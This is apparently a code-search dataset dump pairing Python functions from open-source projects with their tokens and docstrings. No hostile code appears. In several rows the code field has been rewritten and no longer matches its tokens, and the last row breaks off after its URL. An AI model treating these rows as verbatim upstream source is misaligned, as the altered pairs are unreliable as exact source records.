repo
stringlengths
7
54
path
stringlengths
4
192
url
stringlengths
87
284
code
stringlengths
78
104k
code_tokens
list
docstring
stringlengths
1
46.9k
docstring_tokens
list
language
stringclasses
1 value
partition
stringclasses
3 values
KelSolaar/Umbra
umbra/components/factory/script_editor/script_editor.py
https://github.com/KelSolaar/Umbra/blob/66f45f08d9d723787f1191989f8b0dda84b412ce/umbra/components/factory/script_editor/script_editor.py#L1838-L1844
def __Script_Editor_Output_plainTextEdit_set_default_view_state(self):
    """
    Sets the **Script_Editor_Output_plainTextEdit** Widget default View state.

    Scrolls the output widget to its end so the newest output is visible.
    """
    output_widget = self.Script_Editor_Output_plainTextEdit
    output_widget.moveCursor(QTextCursor.End)
    output_widget.ensureCursorVisible()
[ "def", "__Script_Editor_Output_plainTextEdit_set_default_view_state", "(", "self", ")", ":", "self", ".", "Script_Editor_Output_plainTextEdit", ".", "moveCursor", "(", "QTextCursor", ".", "End", ")", "self", ".", "Script_Editor_Output_plainTextEdit", ".", "ensureCursorVisible...
Sets the **Script_Editor_Output_plainTextEdit** Widget default View state.
[ "Sets", "the", "**", "Script_Editor_Output_plainTextEdit", "**", "Widget", "default", "View", "state", "." ]
python
train
fabric-bolt/fabric-bolt
fabric_bolt/projects/views.py
https://github.com/fabric-bolt/fabric-bolt/blob/0f434783026f1b9ce16a416fa496d76921fe49ca/fabric_bolt/projects/views.py#L162-L171
def form_valid(self, form):
    """After the form is valid lets let people know"""
    response = super(ProjectCopy, self).form_valid(form)
    self.copy_relations()
    # Surface a success notice so the user knows the copy finished.
    messages.add_message(self.request, messages.SUCCESS, 'Project %s copied' % self.object.name)
    return response
[ "def", "form_valid", "(", "self", ",", "form", ")", ":", "ret", "=", "super", "(", "ProjectCopy", ",", "self", ")", ".", "form_valid", "(", "form", ")", "self", ".", "copy_relations", "(", ")", "# Good to make note of that", "messages", ".", "add_message", ...
After the form is valid lets let people know
[ "After", "the", "form", "is", "valid", "lets", "let", "people", "know" ]
python
train
eqcorrscan/EQcorrscan
eqcorrscan/core/match_filter.py
https://github.com/eqcorrscan/EQcorrscan/blob/3121b4aca801ee5d38f56ca297ce1c0f9515d9ff/eqcorrscan/core/match_filter.py#L743-L810
def read(self, filename=None, read_detection_catalog=True):
    """
    Read a Party from a file.

    :type filename: str
    :param filename:
        File to read from - can be a list of files, and can contain
        wildcards.
    :type read_detection_catalog: bool
    :param read_detection_catalog:
        Whether to read the detection catalog or not, if False, catalog
        will be regenerated - for large catalogs this can be faster.

    .. rubric:: Example

    >>> Party().read()
    Party of 4 Families.
    """
    tribe = Tribe()
    families = []
    if filename is None:
        # No filename given: fall back to the bundled example party.
        filename = os.path.join(
            os.path.dirname(__file__), '..', 'tests', 'test_data',
            'test_party.tgz')
    if isinstance(filename, list):
        # Expand wildcards in every entry of the list.
        filenames = []
        for _filename in filename:
            filenames.extend(glob.glob(_filename))
    else:
        # Expand wildcards
        filenames = glob.glob(filename)
    for _filename in filenames:
        with tarfile.open(_filename, "r:*") as arc:
            temp_dir = tempfile.mkdtemp()
            arc.extractall(path=temp_dir, members=_safemembers(arc))
        # Read in the detections first, this way, if we read from multiple
        # files then we can just read in extra templates as needed.
        party_dir = glob.glob(temp_dir + os.sep + '*')[0]
        tribe._read_from_folder(dirname=party_dir)
        det_cat_file = glob.glob(os.path.join(party_dir, "catalog.*"))
        if len(det_cat_file) != 0 and read_detection_catalog:
            try:
                all_cat = read_events(det_cat_file[0])
            except TypeError as e:
                print(e)
                pass
        else:
            all_cat = Catalog()
        # Read in families here!
        for family_file in glob.glob(join(party_dir, '*_detections.csv')):
            template = [
                t for t in tribe if _templates_match(t, family_file)]
            family = Family(template=template[0] or Template())
            new_family = True
            if family.template.name in [f.template.name for f in families]:
                family = [
                    f for f in families
                    if f.template.name == family.template.name][0]
                new_family = False
            family.detections = _read_family(
                fname=family_file, all_cat=all_cat, template=template[0])
            if new_family:
                families.append(family)
        shutil.rmtree(temp_dir)
    self.families = families
    return self
[ "def", "read", "(", "self", ",", "filename", "=", "None", ",", "read_detection_catalog", "=", "True", ")", ":", "tribe", "=", "Tribe", "(", ")", "families", "=", "[", "]", "if", "filename", "is", "None", ":", "# If there is no filename given, then read the exa...
Read a Party from a file. :type filename: str :param filename: File to read from - can be a list of files, and can contain wildcards. :type read_detection_catalog: bool :param read_detection_catalog: Whether to read the detection catalog or not, if False, catalog will be regenerated - for large catalogs this can be faster. .. rubric:: Example >>> Party().read() Party of 4 Families.
[ "Read", "a", "Party", "from", "a", "file", "." ]
python
train
LuqueDaniel/pybooru
pybooru/api_moebooru.py
https://github.com/LuqueDaniel/pybooru/blob/60cd5254684d293b308f0b11b8f4ac2dce101479/pybooru/api_moebooru.py#L309-L317
def wiki_create(self, title, body):
    """Create a wiki page (Requires login) (UNTESTED).

    Parameters:
        title (str): The title of the wiki page.
        body (str): The body of the wiki page.
    """
    payload = {
        'wiki_page[title]': title,
        'wiki_page[body]': body,
    }
    return self._get('wiki/create', payload, method='POST')
[ "def", "wiki_create", "(", "self", ",", "title", ",", "body", ")", ":", "params", "=", "{", "'wiki_page[title]'", ":", "title", ",", "'wiki_page[body]'", ":", "body", "}", "return", "self", ".", "_get", "(", "'wiki/create'", ",", "params", ",", "method", ...
Action to lets you create a wiki page (Requires login) (UNTESTED). Parameters: title (str): The title of the wiki page. body (str): The body of the wiki page.
[ "Action", "to", "lets", "you", "create", "a", "wiki", "page", "(", "Requires", "login", ")", "(", "UNTESTED", ")", "." ]
python
train
GoogleCloudPlatform/compute-image-packages
packages/python-google-compute-engine/google_compute_engine/metadata_scripts/script_retriever.py
https://github.com/GoogleCloudPlatform/compute-image-packages/blob/53ea8cd069fb4d9a1984d1c167e54c133033f8da/packages/python-google-compute-engine/google_compute_engine/metadata_scripts/script_retriever.py#L170-L198
def _GetAttributeScripts(self, attribute_data, dest_dir):
    """Retrieve the scripts from attribute metadata.

    Args:
      attribute_data: dict, the contents of the attributes metadata.
      dest_dir: string, the path to a directory for storing metadata scripts.

    Returns:
      dict, a dictionary mapping metadata keys to files storing scripts.
    """
    script_dict = {}
    data = attribute_data or {}

    # Inline script content: persist it to a temp file under dest_dir.
    inline_key = '%s-script' % self.script_type
    inline_value = data.get(inline_key)
    if inline_value:
        self.logger.info('Found %s in metadata.', inline_key)
        with tempfile.NamedTemporaryFile(
                mode='w', dir=dest_dir, delete=False) as dest:
            dest.write(inline_value.lstrip())
            script_dict[inline_key] = dest.name

    # Script URL: download the referenced script into dest_dir.
    url_key = '%s-script-url' % self.script_type
    url_value = data.get(url_key)
    if url_value:
        self.logger.info('Found %s in metadata.', url_key)
        script_dict[url_key] = self._DownloadScript(url_value, dest_dir)

    return script_dict
[ "def", "_GetAttributeScripts", "(", "self", ",", "attribute_data", ",", "dest_dir", ")", ":", "script_dict", "=", "{", "}", "attribute_data", "=", "attribute_data", "or", "{", "}", "metadata_key", "=", "'%s-script'", "%", "self", ".", "script_type", "metadata_va...
Retrieve the scripts from attribute metadata. Args: attribute_data: dict, the contents of the attributes metadata. dest_dir: string, the path to a directory for storing metadata scripts. Returns: dict, a dictionary mapping metadata keys to files storing scripts.
[ "Retrieve", "the", "scripts", "from", "attribute", "metadata", "." ]
python
train
liampauling/betfair
betfairlightweight/endpoints/historic.py
https://github.com/liampauling/betfair/blob/8479392eb4849c525d78d43497c32c0bb108e977/betfairlightweight/endpoints/historic.py#L22-L33
def get_my_data(self, session=None):
    """
    Returns a list of data descriptions for data which has been purchased
    by the signed in user.

    :param requests.session session: Requests session object

    :rtype: dict
    """
    # NOTE: clean_locals(locals()) must run before any other local is
    # bound, so only `self` and `session` are captured as parameters.
    params = clean_locals(locals())
    response, _elapsed_time = self.request('GetMyData', params, session)
    return response
[ "def", "get_my_data", "(", "self", ",", "session", "=", "None", ")", ":", "params", "=", "clean_locals", "(", "locals", "(", ")", ")", "method", "=", "'GetMyData'", "(", "response", ",", "elapsed_time", ")", "=", "self", ".", "request", "(", "method", ...
Returns a list of data descriptions for data which has been purchased by the signed in user. :param requests.session session: Requests session object :rtype: dict
[ "Returns", "a", "list", "of", "data", "descriptions", "for", "data", "which", "has", "been", "purchased", "by", "the", "signed", "in", "user", "." ]
python
train
keenlabs/KeenClient-Python
keen/api.py
https://github.com/keenlabs/KeenClient-Python/blob/266387c3376d1e000d117e17c45045ae3439d43f/keen/api.py#L113-L127
def post_events(self, events):
    """
    Posts a single event to the Keen IO API. The write key must be set first.

    :param events: an Event to upload
    """
    endpoint = "{0}/{1}/projects/{2}/events".format(
        self.base_url, self.api_version, self.project_id)
    response = self.fulfill(
        HTTPMethods.POST,
        endpoint,
        data=json.dumps(events),
        headers=utilities.headers(self.write_key),
        timeout=self.post_timeout,
    )
    self._error_handling(response)
    return self._get_response_json(response)
[ "def", "post_events", "(", "self", ",", "events", ")", ":", "url", "=", "\"{0}/{1}/projects/{2}/events\"", ".", "format", "(", "self", ".", "base_url", ",", "self", ".", "api_version", ",", "self", ".", "project_id", ")", "headers", "=", "utilities", ".", ...
Posts a single event to the Keen IO API. The write key must be set first. :param events: an Event to upload
[ "Posts", "a", "single", "event", "to", "the", "Keen", "IO", "API", ".", "The", "write", "key", "must", "be", "set", "first", "." ]
python
train
aiogram/aiogram
aiogram/types/chat.py
https://github.com/aiogram/aiogram/blob/2af930149ce2482547721e2c8755c10307295e48/aiogram/types/chat.py#L530-L539
async def typing(cls, sleep=None):
    """
    Do typing

    :param sleep: sleep timeout
    :return:
    """
    # String timeouts are converted to numeric values first.
    timeout = cls.calc_timeout(sleep) if isinstance(sleep, str) else sleep
    await cls._do(cls.TYPING, timeout)
[ "async", "def", "typing", "(", "cls", ",", "sleep", "=", "None", ")", ":", "if", "isinstance", "(", "sleep", ",", "str", ")", ":", "sleep", "=", "cls", ".", "calc_timeout", "(", "sleep", ")", "await", "cls", ".", "_do", "(", "cls", ".", "TYPING", ...
Do typing :param sleep: sleep timeout :return:
[ "Do", "typing" ]
python
train
tomplus/kubernetes_asyncio
kubernetes_asyncio/client/api/settings_v1alpha1_api.py
https://github.com/tomplus/kubernetes_asyncio/blob/f9ab15317ec921409714c7afef11aeb0f579985d/kubernetes_asyncio/client/api/settings_v1alpha1_api.py#L879-L903
def read_namespaced_pod_preset(self, name, namespace, **kwargs):  # noqa: E501
    """read_namespaced_pod_preset  # noqa: E501

    read the specified PodPreset  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.read_namespaced_pod_preset(name, namespace, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param str name: name of the PodPreset (required)
    :param str namespace: object name and auth scope, such as for teams and projects (required)
    :param str pretty: If 'true', then the output is pretty printed.
    :param bool exact: Should the export be exact.  Exact export maintains cluster-specific fields like 'Namespace'.
    :param bool export: Should this value be exported.  Export strips fields that a user can not specify.
    :return: V1alpha1PodPreset
             If the method is called asynchronously,
             returns the request thread.
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('async_req'):
        # Asynchronous call: hand the request thread back to the caller.
        return self.read_namespaced_pod_preset_with_http_info(name, namespace, **kwargs)  # noqa: E501
    # Synchronous call: unwrap the response data.
    data = self.read_namespaced_pod_preset_with_http_info(name, namespace, **kwargs)  # noqa: E501
    return data
[ "def", "read_namespaced_pod_preset", "(", "self", ",", "name", ",", "namespace", ",", "*", "*", "kwargs", ")", ":", "# noqa: E501", "kwargs", "[", "'_return_http_data_only'", "]", "=", "True", "if", "kwargs", ".", "get", "(", "'async_req'", ")", ":", "return...
read_namespaced_pod_preset # noqa: E501 read the specified PodPreset # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.read_namespaced_pod_preset(name, namespace, async_req=True) >>> result = thread.get() :param async_req bool :param str name: name of the PodPreset (required) :param str namespace: object name and auth scope, such as for teams and projects (required) :param str pretty: If 'true', then the output is pretty printed. :param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'. :param bool export: Should this value be exported. Export strips fields that a user can not specify. :return: V1alpha1PodPreset If the method is called asynchronously, returns the request thread.
[ "read_namespaced_pod_preset", "#", "noqa", ":", "E501" ]
python
train
saltstack/salt
salt/modules/schedule.py
https://github.com/saltstack/salt/blob/e8541fd6e744ab0df786c0f76102e41631f45d46/salt/modules/schedule.py#L598-L650
def enable_job(name, **kwargs):
    '''
    Enable a job in the minion's schedule

    CLI Example:

    .. code-block:: bash

        salt '*' schedule.enable_job job1
    '''
    ret = {'comment': [], 'result': True}

    if not name:
        ret['comment'] = 'Job name is required.'
        ret['result'] = False

    if 'test' in __opts__ and __opts__['test']:
        # Test mode: report what would happen without firing any event.
        ret['comment'] = 'Job: {0} would be enabled in schedule.'.format(name)
    else:
        persist = kwargs.get('persist', True)

        # Locate the job: opts-defined jobs honour `persist`, pillar jobs
        # are never persisted.
        if name in list_(show_all=True, where='opts', return_yaml=False):
            event_data = {'name': name,
                          'func': 'enable_job',
                          'persist': persist}
        elif name in list_(show_all=True, where='pillar', return_yaml=False):
            event_data = {'name': name,
                          'where': 'pillar',
                          'func': 'enable_job',
                          'persist': False}
        else:
            ret['comment'] = 'Job {0} does not exist.'.format(name)
            ret['result'] = False
            return ret

        try:
            eventer = salt.utils.event.get_event('minion', opts=__opts__)
            res = __salt__['event.fire'](event_data, 'manage_schedule')
            if res:
                event_ret = eventer.get_event(
                    tag='/salt/minion/minion_schedule_enabled_job_complete',
                    wait=30)
                if event_ret and event_ret['complete']:
                    schedule = event_ret['schedule']
                    # check item exists in schedule and is enabled
                    if name in schedule and schedule[name]['enabled']:
                        ret['result'] = True
                        ret['comment'] = 'Enabled Job {0} in schedule.'.format(name)
                    else:
                        ret['result'] = False
                        ret['comment'] = 'Failed to enable job {0} in schedule.'.format(name)
                    return ret
        except KeyError:
            # Effectively a no-op, since we can't really return without an
            # event system
            ret['comment'] = 'Event module not available. Schedule enable job failed.'
    return ret
[ "def", "enable_job", "(", "name", ",", "*", "*", "kwargs", ")", ":", "ret", "=", "{", "'comment'", ":", "[", "]", ",", "'result'", ":", "True", "}", "if", "not", "name", ":", "ret", "[", "'comment'", "]", "=", "'Job name is required.'", "ret", "[", ...
Enable a job in the minion's schedule CLI Example: .. code-block:: bash salt '*' schedule.enable_job job1
[ "Enable", "a", "job", "in", "the", "minion", "s", "schedule" ]
python
train
bbangert/lettuce_webdriver
lettuce_webdriver/screenshot.py
https://github.com/bbangert/lettuce_webdriver/blob/d11f8531c43bb7150c316e0dc4ccd083617becf7/lettuce_webdriver/screenshot.py#L13-L22
def set_save_directory(base, source):
    """Sets the root save directory for saving screenshots.

    Screenshots will be saved in subdirectories under this directory by
    browser window size.
    """
    root_dir = os.path.join(base, source)
    if not os.path.isdir(root_dir):
        os.makedirs(root_dir)
    # Publish the directory on lettuce's shared `world` object.
    world.screenshot_root = root_dir
[ "def", "set_save_directory", "(", "base", ",", "source", ")", ":", "root", "=", "os", ".", "path", ".", "join", "(", "base", ",", "source", ")", "if", "not", "os", ".", "path", ".", "isdir", "(", "root", ")", ":", "os", ".", "makedirs", "(", "roo...
Sets the root save directory for saving screenshots. Screenshots will be saved in subdirectories under this directory by browser window size.
[ "Sets", "the", "root", "save", "directory", "for", "saving", "screenshots", ".", "Screenshots", "will", "be", "saved", "in", "subdirectories", "under", "this", "directory", "by", "browser", "window", "size", "." ]
python
train
Jajcus/pyxmpp2
pyxmpp2/ext/dataforms.py
https://github.com/Jajcus/pyxmpp2/blob/14a40a3950910a9cd008b55f0d8905aa0186ce18/pyxmpp2/ext/dataforms.py#L270-L299
def complete_xml_element(self, xmlnode, doc):
    """Complete the XML node with `self` content.

    :Parameters:
        - `xmlnode`: XML node with the element being built. It has already
          right name and namespace, but no attributes or content.
        - `doc`: document to which the element belongs.
    :Types:
        - `xmlnode`: `libxml2.xmlNode`
        - `doc`: `libxml2.xmlDoc`"""
    if self.type is not None and self.type not in self.allowed_types:
        raise ValueError("Invalid form field type: %r" % (self.type,))
    if self.type is not None:
        xmlnode.setProp("type", self.type)
    if self.label is not None:
        xmlnode.setProp("label", to_utf8(self.label))
    if self.name is not None:
        xmlnode.setProp("var", to_utf8(self.name))
    if self.values:
        # Multiple values are only legal for "*-multi" field types.
        if self.type and len(self.values) > 1 and not self.type.endswith(u"-multi"):
            raise ValueError("Multiple values not allowed for %r field" % (self.type,))
        for value in self.values:
            xmlnode.newTextChild(xmlnode.ns(), "value", to_utf8(value))
    for option in self.options:
        option.as_xml(xmlnode, doc)
    if self.required:
        xmlnode.newChild(xmlnode.ns(), "required", None)
    if self.desc:
        xmlnode.newTextChild(xmlnode.ns(), "desc", to_utf8(self.desc))
    return xmlnode
[ "def", "complete_xml_element", "(", "self", ",", "xmlnode", ",", "doc", ")", ":", "if", "self", ".", "type", "is", "not", "None", "and", "self", ".", "type", "not", "in", "self", ".", "allowed_types", ":", "raise", "ValueError", "(", "\"Invalid form field ...
Complete the XML node with `self` content. :Parameters: - `xmlnode`: XML node with the element being built. It has already right name and namespace, but no attributes or content. - `doc`: document to which the element belongs. :Types: - `xmlnode`: `libxml2.xmlNode` - `doc`: `libxml2.xmlDoc`
[ "Complete", "the", "XML", "node", "with", "self", "content", "." ]
python
valid
boriel/zxbasic
arch/zx48k/optimizer.py
https://github.com/boriel/zxbasic/blob/23b28db10e41117805bdb3c0f78543590853b132/arch/zx48k/optimizer.py#L1654-L1662
def get_label_idx(self, label):
    """ Returns the index of a label.
    Returns None if not found.
    """
    for idx in range(len(self)):
        cell = self.mem[idx]
        if cell.is_label and cell.inst == label:
            return idx
    return None
[ "def", "get_label_idx", "(", "self", ",", "label", ")", ":", "for", "i", "in", "range", "(", "len", "(", "self", ")", ")", ":", "if", "self", ".", "mem", "[", "i", "]", ".", "is_label", "and", "self", ".", "mem", "[", "i", "]", ".", "inst", "...
Returns the index of a label. Returns None if not found.
[ "Returns", "the", "index", "of", "a", "label", ".", "Returns", "None", "if", "not", "found", "." ]
python
train
themartorana/python-postmark
postmark/core.py
https://github.com/themartorana/python-postmark/blob/3087f6894ec2790e295fd59eba9c57da9de78d1c/postmark/core.py#L615-L620
def remove_message(self, message):
    '''
    Remove a message from the batch
    '''
    try:
        self.__messages.remove(message)
    except ValueError:
        # Message was not part of the batch; nothing to do.
        pass
[ "def", "remove_message", "(", "self", ",", "message", ")", ":", "if", "message", "in", "self", ".", "__messages", ":", "self", ".", "__messages", ".", "remove", "(", "message", ")" ]
Remove a message from the batch
[ "Remove", "a", "message", "from", "the", "batch" ]
python
train
jtwhite79/pyemu
pyemu/pst/pst_utils.py
https://github.com/jtwhite79/pyemu/blob/c504d8e7a4097cec07655a6318d275739bd8148a/pyemu/pst/pst_utils.py#L289-L304
def write_input_files(pst):
    """write parameter values to a model input files using a template files with
    current parameter values (stored in Pst.parameter_data.parval1).

    This is a simple implementation of what PEST does.  It does not
    handle all the special cases, just a basic function...user beware

    Parameters
    ----------
    pst : (pyemu.Pst)
        a Pst instance
    """
    params = pst.parameter_data
    # Apply the scale/offset transform before writing.
    params.loc[:, "parval1_trans"] = (params.parval1 * params.scale) + params.offset
    for tpl_file, in_file in zip(pst.template_files, pst.input_files):
        write_to_template(pst.parameter_data.parval1_trans, tpl_file, in_file)
[ "def", "write_input_files", "(", "pst", ")", ":", "par", "=", "pst", ".", "parameter_data", "par", ".", "loc", "[", ":", ",", "\"parval1_trans\"", "]", "=", "(", "par", ".", "parval1", "*", "par", ".", "scale", ")", "+", "par", ".", "offset", "for", ...
write parameter values to a model input files using a template files with current parameter values (stored in Pst.parameter_data.parval1). This is a simple implementation of what PEST does. It does not handle all the special cases, just a basic function...user beware Parameters ---------- pst : (pyemu.Pst) a Pst instance
[ "write", "parameter", "values", "to", "a", "model", "input", "files", "using", "a", "template", "files", "with", "current", "parameter", "values", "(", "stored", "in", "Pst", ".", "parameter_data", ".", "parval1", ")", ".", "This", "is", "a", "simple", "im...
python
train
vladsaveliev/TargQC
targqc/utilz/jsontemplate/_jsontemplate.py
https://github.com/vladsaveliev/TargQC/blob/e887c36b2194dbd73c6ea32989b6cb84c6c0e58d/targqc/utilz/jsontemplate/_jsontemplate.py#L454-L463
def NewOrClause(self, pred_str):
    """
    {.or ...}

    Can appear inside predicate blocks or section blocks, with slightly
    different meaning.
    """
    # An empty predicate string means an unconditional {.or} clause.
    pred = self._GetPredicate(pred_str, test_attr=False) if pred_str else None
    self.current_section.NewOrClause(pred)
[ "def", "NewOrClause", "(", "self", ",", "pred_str", ")", ":", "if", "pred_str", ":", "pred", "=", "self", ".", "_GetPredicate", "(", "pred_str", ",", "test_attr", "=", "False", ")", "else", ":", "pred", "=", "None", "self", ".", "current_section", ".", ...
{.or ...} Can appear inside predicate blocks or section blocks, with slightly different meaning.
[ "{", ".", "or", "...", "}", "Can", "appear", "inside", "predicate", "blocks", "or", "section", "blocks", "with", "slightly", "different", "meaning", "." ]
python
train
tanghaibao/goatools
goatools/obo_parser.py
https://github.com/tanghaibao/goatools/blob/407682e573a108864a79031f8ca19ee3bf377626/goatools/obo_parser.py#L245-L251
def get_all_child_edges(self):
    """Return tuples for all child GO IDs, containing current GO ID and child GO ID."""
    edges = set()
    for child in self.children:
        edges.add((child.item_id, self.item_id))
        edges.update(child.get_all_child_edges())
    return edges
[ "def", "get_all_child_edges", "(", "self", ")", ":", "all_child_edges", "=", "set", "(", ")", "for", "parent", "in", "self", ".", "children", ":", "all_child_edges", ".", "add", "(", "(", "parent", ".", "item_id", ",", "self", ".", "item_id", ")", ")", ...
Return tuples for all child GO IDs, containing current GO ID and child GO ID.
[ "Return", "tuples", "for", "all", "child", "GO", "IDs", "containing", "current", "GO", "ID", "and", "child", "GO", "ID", "." ]
python
train
ktdreyer/txkoji
txkoji/connection.py
https://github.com/ktdreyer/txkoji/blob/a7de380f29f745bf11730b27217208f6d4da7733/txkoji/connection.py#L356-L370
def listTagged(self, *args, **kwargs):
    """
    List builds tagged with a tag.

    Calls "listTagged" XML-RPC.

    :returns: deferred that when fired returns a list of Build objects.
    """
    raw_builds = yield self.call('listTagged', *args, **kwargs)
    results = []
    for entry in raw_builds:
        build = Build.fromDict(entry)
        # Attach this connection so the Build can make follow-up calls.
        build.connection = self
        results.append(build)
    defer.returnValue(results)
[ "def", "listTagged", "(", "self", ",", "*", "args", ",", "*", "*", "kwargs", ")", ":", "data", "=", "yield", "self", ".", "call", "(", "'listTagged'", ",", "*", "args", ",", "*", "*", "kwargs", ")", "builds", "=", "[", "]", "for", "bdata", "in", ...
List builds tagged with a tag. Calls "listTagged" XML-RPC. :returns: deferred that when fired returns a list of Build objects.
[ "List", "builds", "tagged", "with", "a", "tag", "." ]
python
train
Dentosal/python-sc2
sc2/client.py
https://github.com/Dentosal/python-sc2/blob/608bd25f04e89d39cef68b40101d8e9a8a7f1634/sc2/client.py#L249-L270
async def query_available_abilities(
    self, units: Union[List[Unit], "Units"], ignore_resource_requirements: bool = False
) -> List[List[AbilityId]]:
    """ Query abilities of multiple units """
    input_was_a_list = isinstance(units, list)
    if not input_was_a_list:
        # Deprecated: accepting a single unit may be removed in the future,
        # query a list of units instead.
        assert isinstance(units, Unit)
        units = [units]
    assert units
    result = await self._execute(
        query=query_pb.RequestQuery(
            abilities=[query_pb.RequestQueryAvailableAbilities(unit_tag=unit.tag) for unit in units],
            ignore_resource_requirements=ignore_resource_requirements,
        )
    )
    ability_lists = [[AbilityId(a.ability_id) for a in b.abilities] for b in result.query.abilities]
    # Bots that queried a single unit get that unit's list back directly.
    return ability_lists if input_was_a_list else ability_lists[0]
[ "async", "def", "query_available_abilities", "(", "self", ",", "units", ":", "Union", "[", "List", "[", "Unit", "]", ",", "\"Units\"", "]", ",", "ignore_resource_requirements", ":", "bool", "=", "False", ")", "->", "List", "[", "List", "[", "AbilityId", "]...
Query abilities of multiple units
[ "Query", "abilities", "of", "multiple", "units" ]
python
train
jazzband/django-authority
authority/permissions.py
https://github.com/jazzband/django-authority/blob/58e08483cdd91a6a69e8019dd2a2edf68531ae97/authority/permissions.py#L119-L138
def _user_perm_cache(self):
    """
    cached_permissions will generate the cache in a lazy fashion.
    """
    # No user: nothing to cache.
    if not self.user:
        return {}
    # Check to see if the cache has been primed.
    if getattr(self.user, '_authority_perm_cache_filled', False):
        # Don't really like the name for this, but this matches how Django
        # does it.
        return self.user._authority_perm_cache
    # Prime the cache.
    self._prime_user_perm_caches()
    return self.user._authority_perm_cache
[ "def", "_user_perm_cache", "(", "self", ")", ":", "# Check to see if the cache has been primed.", "if", "not", "self", ".", "user", ":", "return", "{", "}", "cache_filled", "=", "getattr", "(", "self", ".", "user", ",", "'_authority_perm_cache_filled'", ",", "Fals...
cached_permissions will generate the cache in a lazy fashion.
[ "cached_permissions", "will", "generate", "the", "cache", "in", "a", "lazy", "fashion", "." ]
python
train
nws-cip/zenconf
zenconf/merged_config.py
https://github.com/nws-cip/zenconf/blob/fc96706468c0741fb1b54b2eeb9f9225737e3e36/zenconf/merged_config.py#L47-L70
def walk_recursive(f, data):
    """
    Recursively apply a function to all dicts in a nested dictionary

    Dict keys (and bare scalar inputs) are passed through ``f``; dict
    values are only recursed into when they are themselves dicts or lists,
    otherwise they are kept unchanged.

    :param f: Function to apply
    :param data: Dictionary (possibly nested) to recursively apply
    function to
    :return: the transformed structure
    """
    if isinstance(data, list):
        return [walk_recursive(f, d) for d in data]
    if isinstance(data, dict):
        results = {}
        # .items() replaces the Python-2-only .iteritems() of the original.
        for k, v in data.items():
            if isinstance(v, (dict, list)):
                results[f(k)] = walk_recursive(f, v)
            else:
                # Plain values are kept as-is; only keys are rewritten.
                # (The original buggily did `return f(data)` here, aborting
                # the walk on the first scalar value.)
                results[f(k)] = v
        return results
    return f(data)
[ "def", "walk_recursive", "(", "f", ",", "data", ")", ":", "results", "=", "{", "}", "if", "isinstance", "(", "data", ",", "list", ")", ":", "return", "[", "walk_recursive", "(", "f", ",", "d", ")", "for", "d", "in", "data", "]", "elif", "isinstance...
Recursively apply a function to all dicts in a nested dictionary :param f: Function to apply :param data: Dictionary (possibly nested) to recursively apply function to :return:
[ "Recursively", "apply", "a", "function", "to", "all", "dicts", "in", "a", "nested", "dictionary" ]
python
train
defunkt/pystache
pystache/parser.py
https://github.com/defunkt/pystache/blob/17a5dfdcd56eb76af731d141de395a7632a905b8/pystache/parser.py#L242-L338
def parse(self, template):
    """
    Parse a template string starting at some index.

    This method uses the current tag delimiter.

    Arguments:

      template: a unicode string that is the template to parse.

      index: the index at which to start parsing.

    Returns:

      a ParsedTemplate instance.
    """
    self._compile_delimiters()

    start_index = 0
    content_end_index, parsed_section, section_key = None, None, None
    parsed_template = ParsedTemplate()

    # Stack of (tag_type, end_index, section_key, parsed_template) saved
    # when entering a section; popped when the section closes.
    states = []

    while True:
        match = self._template_re.search(template, start_index)
        if match is None:
            break

        match_index = match.start()
        end_index = match.end()
        matches = match.groupdict()

        # Normalize the matches dictionary.
        if matches['change'] is not None:
            matches.update(tag='=', tag_key=matches['delims'])
        elif matches['raw'] is not None:
            matches.update(tag='&', tag_key=matches['raw_name'])

        tag_type = matches['tag']
        tag_key = matches['tag_key']
        leading_whitespace = matches['whitespace']

        # Standalone (non-interpolation) tags consume the entire line,
        # both leading whitespace and trailing newline.
        did_tag_begin_line = match_index == 0 or template[match_index - 1] in END_OF_LINE_CHARACTERS
        did_tag_end_line = end_index == len(template) or template[end_index] in END_OF_LINE_CHARACTERS
        is_tag_interpolating = tag_type in ['', '&']

        if did_tag_begin_line and did_tag_end_line and not is_tag_interpolating:
            # Swallow a trailing \r, \n, or \r\n after a standalone tag.
            if end_index < len(template):
                end_index += template[end_index] == '\r' and 1 or 0
            if end_index < len(template):
                end_index += template[end_index] == '\n' and 1 or 0
        elif leading_whitespace:
            match_index += len(leading_whitespace)
            leading_whitespace = ''

        # Avoid adding spurious empty strings to the parse tree.
        if start_index != match_index:
            parsed_template.add(template[start_index:match_index])

        start_index = end_index

        if tag_type in ('#', '^'):
            # Cache current state.
            states.append((tag_type, end_index, section_key, parsed_template))

            # Initialize new state
            section_key, parsed_template = tag_key, ParsedTemplate()
            continue

        if tag_type == '/':
            if tag_key != section_key:
                raise ParsingError("Section end tag mismatch: %s != %s" % (tag_key, section_key))

            # Restore previous state with newly found section data.
            parsed_section = parsed_template
            (tag_type, section_start_index, section_key, parsed_template) = states.pop()
            node = self._make_section_node(
                template, tag_type, tag_key, parsed_section,
                section_start_index, match_index)
        else:
            node = self._make_interpolation_node(tag_type, tag_key, leading_whitespace)

        parsed_template.add(node)

    # Avoid adding spurious empty strings to the parse tree.
    if start_index != len(template):
        parsed_template.add(template[start_index:])

    return parsed_template
[ "def", "parse", "(", "self", ",", "template", ")", ":", "self", ".", "_compile_delimiters", "(", ")", "start_index", "=", "0", "content_end_index", ",", "parsed_section", ",", "section_key", "=", "None", ",", "None", ",", "None", "parsed_template", "=", "Par...
Parse a template string starting at some index. This method uses the current tag delimiter. Arguments: template: a unicode string that is the template to parse. index: the index at which to start parsing. Returns: a ParsedTemplate instance.
[ "Parse", "a", "template", "string", "starting", "at", "some", "index", "." ]
python
train
Kautenja/nes-py
nes_py/_image_viewer.py
https://github.com/Kautenja/nes-py/blob/a113885198d418f38fcf24b8f79ac508975788c2/nes_py/_image_viewer.py#L50-L80
